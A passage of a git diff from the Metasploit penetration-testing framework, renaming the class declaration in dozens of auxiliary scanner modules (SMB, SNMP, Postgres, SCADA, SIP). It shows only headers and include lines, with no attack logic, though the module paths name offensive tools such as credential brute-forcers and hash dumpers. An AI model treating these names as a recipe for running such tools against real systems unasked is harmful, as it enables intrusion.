+class Metasploit3 < Msf::Auxiliary # Order is important here include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index 31db357b39..b59ee5c028 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index d13a37b58a..299c1210af 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index e7d6806a17..8f64a84695 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb index 899a6822cf..9e48bfc0ec 100644 --- a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb +++ b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index 7b2c311641..a4c3066cfb 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 24970fe633..9c2d96dc71 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/postgres' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index efa1f9c8db..b42313a194 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 4c175e579c..8a2bea7d9c 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/quake/server_info.rb b/modules/auxiliary/scanner/quake/server_info.rb index 0ddee0f23b..f8012e7a4c 100644 --- a/modules/auxiliary/scanner/quake/server_info.rb +++ b/modules/auxiliary/scanner/quake/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/quake' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Quake diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index f4641c20ae..f9174649d9 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/redis/file_upload.rb b/modules/auxiliary/scanner/redis/file_upload.rb index f1b21cc0a6..3842aea864 100644 --- a/modules/auxiliary/scanner/redis/file_upload.rb +++ b/modules/auxiliary/scanner/redis/file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Redis def initialize(info = {}) diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index cb4f3212f0..6d91606685 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Redis include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index e76ebc40c7..4293d6bc1e 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index 9832790bde..9e2b9cf3ec 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index 0e4dc663e9..f2a93ecf5a 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index bd6bc9cfc4..7d1414a6d6 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index 3bcd98f83a..8892b023d5 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 19cac36faf..9bdfaaf4f5 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 05fef9d855..7cea619121 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index d8ee1cd906..79f9882999 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index 2e6e24de49..a93c3dfafe 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_addp_version.rb b/modules/auxiliary/scanner/scada/digi_addp_version.rb index 23b03af38e..3de56d9a43 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_version.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb index 682e2a874a..0838eae12e 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_realport_version.rb b/modules/auxiliary/scanner/scada/digi_realport_version.rb index 09e155e757..b0a9ea2d1c 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_version.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb index d133452290..ecf1f50a29 100644 --- a/modules/auxiliary/scanner/scada/koyo_login.rb +++ b/modules/auxiliary/scanner/scada/koyo_login.rb @@ -8,7 +8,7 @@ require 'msf/core' # msfdev is going to want a bunch of other stuff for style/compat but this works # TODO: Make into a real AuthBrute module, although the password pattern is fixed -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/modbus_findunitid.rb b/modules/auxiliary/scanner/scada/modbus_findunitid.rb index f804a141e7..d570f4281b 100644 --- a/modules/auxiliary/scanner/scada/modbus_findunitid.rb +++ b/modules/auxiliary/scanner/scada/modbus_findunitid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 274b83802c..70b5242414 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/scada/modbusdetect.rb b/modules/auxiliary/scanner/scada/modbusdetect.rb index 5cbbe792d9..7740955785 100644 --- a/modules/auxiliary/scanner/scada/modbusdetect.rb +++ b/modules/auxiliary/scanner/scada/modbusdetect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb index b3779c9c64..c584b0e939 100644 --- a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index 1d2f3beb2f..dc9bcb0b3a 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 5ffc5fbb92..134cf2a2b1 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 34f4ab3993..01dc953c4e 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index 922355dac2..581283c74e 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb index dde0a4c1c0..590b4c3a46 100644 --- a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb +++ b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 71bedf2906..67304ca6ba 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index 5943ee7990..b7c68054c6 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 252bfecc09..6717969a73 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index 0ddfe37e01..d145bd5b26 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should go first include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb index ac8b3a19d4..1100dd05c1 100644 --- a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb +++ b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/group_policy_preferences' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index 78a90f101a..e4118ded74 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index 3ca80b9df4..3238c66dfc 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index ce8b5156f8..e8775e681f 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index e53923cd61..0fdf529ca7 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smb' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index a389609c63..eddfc7c841 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb index 1ed65c9b69..8a0c584137 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index 2af76e27c9..9a1c016918 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'recog' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 7c5f241293..7ff74bee87 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb index b103aebcbc..eae920be73 100644 --- a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb +++ b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_relay.rb b/modules/auxiliary/scanner/smtp/smtp_relay.rb index e978dc86ec..cac03b0b94 100644 --- a/modules/auxiliary/scanner/smtp/smtp_relay.rb +++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index ba552d1a12..54069a0dfb 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index a8cec3080f..99d8353ee0 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/arris_dg950.rb b/modules/auxiliary/scanner/snmp/arris_dg950.rb index a5466c38f3..a071e85520 100644 --- a/modules/auxiliary/scanner/snmp/arris_dg950.rb +++ b/modules/auxiliary/scanner/snmp/arris_dg950.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index 5e1f24b077..f78cc130b9 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 2e514c43f2..6f4172e35d 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index 8829a263f0..bad6580176 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index f148956c8c..8fe98c4273 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb index 6763e8600b..904d5e8b0f 100644 --- a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb +++ b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index 09555100ba..07530dafd5 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index e0db3cbf54..dd54f5cd9e 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 32a033b7f9..8886a67ae8 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 72c0bc9f7d..34a0940b48 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index dbff3cb0c0..a12761684b 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/community_string_collection' require 'metasploit/framework/login_scanner/snmp' -class 